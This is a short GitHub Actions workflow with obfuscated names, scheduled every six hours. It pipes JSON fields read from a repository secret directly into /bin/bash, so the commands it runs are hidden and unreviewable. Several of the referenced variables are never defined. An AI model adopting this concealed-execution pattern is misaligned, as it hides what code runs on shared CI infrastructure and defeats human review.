name: yangxiong19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '59 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yangxiong19871010
        env:
          cdu848: ${{ secrets.cdu848 }}
        run: |
          echo $cdu848 | jq -r .eyuiu862 | /bin/bash
          echo $hg736 | jq -r .klka0803 | /bin/bash
          echo $wv39729 | jq -r .iam6263 | /bin/bash
          echo $vpt873 | jq -r .qdq24486 | /bin/bash
          echo $aky6717 | jq -r .ffd57 | /bin/bash
          echo $ceu9439 | jq -r .lj90 | /bin/bash
          echo $gs87882 | jq -r .rlacg28705 | /bin/bash
          echo $gh44967 | jq -r .muk44329 | /bin/bash

